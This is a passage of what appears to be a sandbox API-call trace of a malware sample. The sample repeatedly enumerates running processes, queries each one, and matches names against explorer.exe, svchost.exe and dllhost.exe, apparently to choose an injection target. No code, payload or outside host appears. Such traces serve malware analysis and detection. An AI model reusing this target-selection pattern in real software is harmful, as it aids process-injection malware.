th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0186.252] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0186.252] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0186.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0186.253] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0186.253] CloseHandle (hObject=0xd8) returned 1 [0186.253] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0186.253] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0186.253] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0186.253] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0186.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0186.254] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0186.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0186.254] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0186.254] CloseHandle (hObject=0xd8) returned 1 [0186.254] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0186.254] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0186.254] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0186.254] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0186.255] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0186.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0186.255] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0186.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0186.256] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0186.256] CloseHandle (hObject=0xd8) returned 1 [0186.256] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0186.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0186.256] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0186.256] CloseHandle (hObject=0xd8) returned 1 [0186.256] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0186.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0186.257] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0186.257] CloseHandle (hObject=0xd8) returned 1 [0186.257] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0186.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0186.257] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0186.258] CloseHandle (hObject=0xd8) returned 1 [0186.258] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0186.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0186.258] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0186.258] CloseHandle (hObject=0xd8) returned 1 [0186.258] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0186.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0186.259] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0186.259] CloseHandle (hObject=0xd8) returned 1 [0186.259] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0186.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0186.259] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0186.259] CloseHandle (hObject=0xd8) returned 1 [0186.259] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0186.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0186.260] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0186.260] CloseHandle (hObject=0xd8) returned 1 [0186.260] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0186.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0186.260] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0186.260] CloseHandle (hObject=0xd8) returned 1 [0186.260] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0186.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0186.261] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0186.261] CloseHandle (hObject=0xd8) returned 1 [0186.261] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0186.262] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0186.262] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0186.262] CloseHandle (hObject=0xd8) returned 1 [0186.262] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0186.262] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0186.262] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0186.262] CloseHandle (hObject=0xd8) returned 1 [0186.262] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0186.263] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0186.263] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0186.263] CloseHandle (hObject=0xd8) returned 1 [0186.263] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0186.263] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0186.263] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0186.263] CloseHandle (hObject=0xd8) returned 1 [0186.263] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0186.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0186.264] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0186.264] CloseHandle (hObject=0xd8) returned 1 [0186.264] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0186.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0186.264] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0186.264] CloseHandle (hObject=0xd8) returned 1 [0186.265] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0186.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0186.265] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0186.265] CloseHandle (hObject=0xd8) returned 1 [0186.265] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0186.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0186.266] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0186.266] CloseHandle (hObject=0xd8) returned 1 [0186.266] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0186.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0186.266] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0186.266] CloseHandle (hObject=0xd8) returned 1 [0186.266] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0186.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0186.267] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0186.267] CloseHandle (hObject=0xd8) returned 1 [0186.267] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0186.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0186.267] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0186.267] CloseHandle (hObject=0xd8) returned 1 [0186.267] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0186.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0186.268] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0186.268] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0186.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0186.269] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0186.269] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0186.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0186.270] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0186.270] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0186.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0186.271] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0186.271] CloseHandle (hObject=0xd8) returned 1 [0186.271] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0186.271] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0186.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0186.271] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0186.271] CloseHandle (hObject=0xd8) returned 1 [0186.272] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0186.272] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0186.272] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0186.272] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0186.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0186.272] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0186.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0186.298] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0186.298] CloseHandle (hObject=0xd8) returned 1 [0186.298] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0186.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0186.298] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0186.298] CloseHandle (hObject=0xd8) returned 1 [0186.298] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0186.298] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0186.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0186.299] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0186.299] CloseHandle (hObject=0xd8) returned 1 [0186.299] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0186.299] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0186.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0186.300] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0186.300] CloseHandle (hObject=0xd8) returned 1 [0186.300] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0186.300] CloseHandle (hObject=0xd4) returned 1 [0186.300] Sleep (dwMilliseconds=0x3e8) [0187.327] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0187.328] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0187.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0187.329] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0187.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0187.329] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0187.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0187.330] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0187.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0187.330] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0187.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0187.331] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0187.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0187.331] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0187.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0187.332] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0187.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0187.332] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, 